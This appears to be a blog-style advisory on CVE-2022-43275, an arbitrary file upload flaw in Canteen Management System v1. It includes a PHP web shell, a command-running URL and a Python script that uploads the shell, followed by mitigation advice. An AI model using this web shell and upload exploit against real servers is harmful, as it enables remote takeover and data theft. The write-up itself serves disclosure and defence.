CVE-2022-43275 - Exploiting Arbitrary File Upload in Canteen Management System v1.

---

CVE-ID: CVE-2022-43275  
Vulnerability Type: Arbitrary File Upload  
Affected Product: Canteen Management System v1.  
Component: /youthappam/php_action/editProductImage.php  
Impact: Remote Code Execution (RCE)  
Disclosure: Public  
References:  
- Exploit Database #51068  
- NVD CVE Details

Introduction

At the heart of every institution's digital cafeteria, a canteen management system promises to streamline daily operations, making life easier for both staff and customers. However, when security flaws sneak in, these same systems can become gateways for attackers. Today, we will break down the details of CVE-2022-43275, a dangerous arbitrary file upload vulnerability discovered in Canteen Management System v1..

This vulnerability allows malicious users to upload crafted PHP files to the server using the /youthappam/php_action/editProductImage.php endpoint, giving attackers the ability to remotely execute any code they choose.

What’s Going Wrong?

The editProductImage.php feature is meant for administrators to update product images. Unfortunately, this script fails to properly validate uploaded files. There is no check for the file type, extension, or content, which means an attacker can upload a PHP file instead of an image.

Why is this Bad?

Once an attacker uploads a malicious PHP file, they can access it through the web server and execute commands on the affected system. This can lead to a full server takeover, data theft, or deployment of malware.

1. Gaining Access to the File Upload

Usually, attackers start by registering for a low-privilege account (if the page isn’t protected). Otherwise, they directly access the upload endpoint or look for a session bypass.

2. Uploading a PHP Web Shell

The attacker uses the vulnerable endpoint /youthappam/php_action/editProductImage.php to upload a PHP web shell. Here’s a classic example of a very basic PHP shell:

<?php
// Simple PHP webshell
if(isset($_REQUEST['cmd'])){
    system($_REQUEST['cmd']);
}
?>

Let’s pretend the attacker saves this as shell.php and uploads it via the product image edit form.

3. Accessing the Uploaded Shell

If successful, the file is placed in an accessible directory (often /youthappam/assets/myImages/ or similar). The attacker navigates to:

http://target-site/youthappam/assets/myImages/shell.php?cmd=whoami

This executes the whoami command on the server and returns the result.

Below is a Python exploit that demonstrates how an attacker could upload a PHP shell

import requests

url = "http://target-site/youthappam/php_action/editProductImage.php";
shell_file = {
    'productImage': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php')
}

# You may need to adjust 'productId' and authentication if necessary
data = {
    'productId': '1'
}

response = requests.post(url, files=shell_file, data=data)

if response.status_code == 200 and "success" in response.text:
    print("Shell uploaded! Try visiting:")
    print("http://target-site/youthappam/assets/myImages/shell.php?cmd=id";)
else:
    print("Upload failed.")

Remote Code Execution: Attackers can execute any command.

- Full Server Compromise: Attackers can upload additional tools, steal data, or move further into the network.

Data Breach: Sensitive canteen records and user info could be accessed or destroyed.

CVSS Score: 9.8 Critical (as per NVD)

Update Your System: Check for vendor patches or apply any available security updates.

2. File Type Validation: Only allow specific image types (JPG, PNG, GIF), and validate both file extension and MIME type.

Example PHP file validation (very basic)

$allowed = array('png', 'jpg', 'jpeg', 'gif');
$filename = $_FILES['productImage']['name'];
$ext = pathinfo($filename, PATHINFO_EXTENSION);
if(!in_array(strtolower($ext), $allowed)) {
    die("Invalid file type.");
}

Final Notes

CVE-2022-43275 is a classic case of overlooked security in web applications. Arbitrary file upload flaws are common—but devastating. If you run Canteen Management System v1. or similar platforms, it's urgent to audit your code and apply strict upload restrictions.

For more technical details, check out the original Exploit-DB entry and NVD advisory.

Stay vigilant, patch often, and never trust user uploads!

*This post is exclusive and crafted for community awareness. Disclose responsibly, and never test exploits on systems you do not own or have explicit permission to assess.*

Timeline

Published on: 10/28/2022 14:15:00 UTC
Last modified on: 10/28/2022 18:27:00 UTC